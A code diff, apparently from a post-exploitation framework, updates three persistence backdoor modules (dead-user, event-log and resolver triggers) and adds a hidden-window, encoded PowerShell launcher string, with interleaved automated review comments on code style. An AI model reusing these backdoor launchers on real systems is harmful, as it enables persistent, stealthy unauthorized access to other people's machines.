diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py
index 2072b6f..7c75df6 100644
--- a/lib/modules/powershell/persistence/powerbreach/deaduser.py
+++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py
@@ -149,7 +149,7 @@ Invoke-DeadUserBackdoor"""
 else:
 # set the listener value for the launcher
- stager = self.mainMenu.stagers.stagers["launcher"]
+ stager = self.mainMenu.stagers.stagers["multi/launcher"]
 stager.options['Listener']['Value'] = listenerName
 stager.options['Base64']['Value'] = "False"
@@ -188,7 +188,8 @@ Invoke-DeadUserBackdoor"""
 script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe
 # so it survives the agent exiting
- launcher = helpers.powershell_launcher(script)
+ modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+ launcher = helpers.powershell_launcher(script, modifiable_launcher)
 stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
 parts = stagerCode.split(" ")
diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py
index ee56f7f..5c552c5 100644
--- a/lib/modules/powershell/persistence/powerbreach/eventlog.py
+++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py
@@ -123,7 +123,7 @@ Invoke-EventLogBackdoor"""
 else:
 # set the listener value for the launcher
- stager = self.mainMenu.stagers.stagers["launcher"]
+ stager = self.mainMenu.stagers.stagers["multi/launcher"]
 stager.options['Listener']['Value'] = listenerName
 stager.options['Base64']['Value'] = "False"
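Review bot: The new lookup `self.mainMenu.stagers.stagers["multi/launcher"]` in deaduser.py (hunk `@@ -149,7 +149,7 @@`) is an unguarded index on a string key that this commit has to correct by hand in three files; the same line appears in eventlog.py (`@@ -123,7 +123,7 @@`) and resolver.py (`@@ -136,7 +136,7 @@`). Another rename of the stager would raise a bare KeyError in each module rather than a readable error. Assuming `stagers` is a plain dict (its definition is not visible here), name the key once in a shared constant and guard the lookup, e.g. `stager = self.mainMenu.stagers.stagers.get(LAUNCHER_STAGER)` followed by an explicit error when it is `None`, where `LAUNCHER_STAGER` is a placeholder name. The context lines after the lookup assign `Listener` and `Base64` on the returned object; if that object is shared between modules, those values outlive this call, which deserves a comment. The enclosing `else:` branch starts and ends outside the hunk.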
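Review bot: `modifiable_launcher` in deaduser.py (hunk `@@ -188,7 +188,8 @@`) is a fixed literal despite its name, and the identical two added lines are pasted into eventlog.py (`@@ -162,7 +162,8 @@`) and resolver.py (`@@ -175,7 +175,8 @@`). Three copies of one string will drift the next time the helper's expectations change. Define it once at module or package level and pass that name at all three call sites, or make it the default of the second parameter of `helpers.powershell_launcher` if that signature (not visible here) allows it. The literal ends in a trailing space that looks significant, and the result is later cut up by `stagerCode.split(" ")`, so a one-line comment should state what the helper expects of this prefix. The enclosing method starts and ends outside the hunk.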
@@ -162,7 +162,8 @@ Invoke-EventLogBackdoor"""
 script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe
 # so it survives the agent exiting
- launcher = helpers.powershell_launcher(script)
+ modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+ launcher = helpers.powershell_launcher(script, modifiable_launcher)
 stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
 parts = stagerCode.split(" ")
diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py
index 5ca8769..554a3cc 100644
--- a/lib/modules/powershell/persistence/powerbreach/resolver.py
+++ b/lib/modules/powershell/persistence/powerbreach/resolver.py
@@ -136,7 +136,7 @@ Invoke-ResolverBackdoor"""
 else:
 # set the listener value for the launcher
- stager = self.mainMenu.stagers.stagers["launcher"]
+ stager = self.mainMenu.stagers.stagers["multi/launcher"]
 stager.options['Listener']['Value'] = listenerName
 stager.options['Base64']['Value'] = "False"
@@ -175,7 +175,8 @@ Invoke-ResolverBackdoor"""
 script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
 # transform the backdoor into something launched by powershell.exe
 # so it survives the agent exiting
- launcher = helpers.powershell_launcher(script)
+ modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
+ launcher = helpers.powershell_launcher(script, modifiable_launcher)
 stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
 parts = stagerCode.split(" ")